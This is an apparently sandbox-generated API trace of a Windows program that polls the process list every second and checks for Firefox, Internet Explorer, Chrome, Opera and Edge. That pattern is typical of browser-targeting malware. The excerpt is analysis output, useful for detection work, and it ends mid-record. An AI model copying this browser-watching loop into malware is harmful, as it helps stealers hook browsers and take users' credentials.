lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0177.994] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0177.994] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0177.994] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0177.994] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0177.994] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.994] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0177.995] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0177.995] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0177.995] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0177.995] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0177.995] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.995] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0177.995] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0177.995] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0177.995] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0177.995] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0177.995] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.995] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0177.996] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0177.996] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0177.996] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0177.996] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0177.996] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.996] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0177.996] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0177.996] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0177.996] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0177.996] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0177.997] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.997] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0177.997] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0177.997] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0177.997] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0177.997] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0177.997] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.997] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0177.998] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0177.998] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0177.998] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0177.998] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0177.998] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.998] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0177.998] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0177.998] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0177.998] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0177.998] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0177.998] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.998] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0177.999] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0177.999] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0177.999] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0177.999] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0177.999] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.999] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0177.999] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0177.999] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0177.999] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0177.999] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0177.999] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.999] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0178.000] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0178.000] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0178.000] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0178.000] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0178.000] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.000] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0178.001] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0178.001] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0178.001] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0178.001] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0178.001] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.001] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0178.001] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0178.001] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0178.001] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0178.001] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0178.001] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.001] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0178.002] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0178.002] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0178.002] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0178.002] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0178.002] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.002] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.002] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0178.002] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0178.002] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0178.002] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0178.002] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.002] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.003] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.003] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.003] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.003] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0178.003] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.003] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0178.004] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0178.004] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0178.004] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0178.004] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0178.004] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.004] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.004] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.004] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.004] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.004] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0178.004] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.004] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0178.005] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0178.005] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0178.005] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0178.005] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0178.005] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.005] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.005] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.006] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.006] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.006] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0178.006] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.006] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.006] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.006] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.006] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.006] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0178.006] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.006] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0178.007] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0178.007] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0178.007] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0178.007] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0178.007] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.007] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.007] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0178.007] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0178.007] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0178.007] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0178.007] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.007] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.008] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.008] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.008] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.008] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0178.008] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.008] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.008] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.009] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0178.009] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.009] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.010] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.010] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.010] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.010] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0178.010] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.010] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0178.010] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0178.010] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0178.010] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0178.010] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0178.010] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0178.010] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0178.011] CloseHandle (hObject=0xe8) returned 1 [0178.011] Sleep (dwMilliseconds=0x3e8) [0179.019] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0179.021] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.021] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0179.021] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0179.021] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0179.021] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0179.021] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0179.021] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.022] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0179.022] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0179.022] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0179.022] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0179.022] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0179.022] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.022] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0179.022] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0179.022] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0179.022] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0179.022] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.022] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.023] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0179.023] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0179.023] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0179.023] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0179.023] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.023] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.023] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0179.023] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0179.023] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0179.023] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0179.024] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.024] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.024] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0179.024] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0179.024] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0179.024] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0179.024] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.024] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0179.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0179.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0179.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0179.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.025] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0179.025] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0179.025] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0179.025] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0179.025] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, 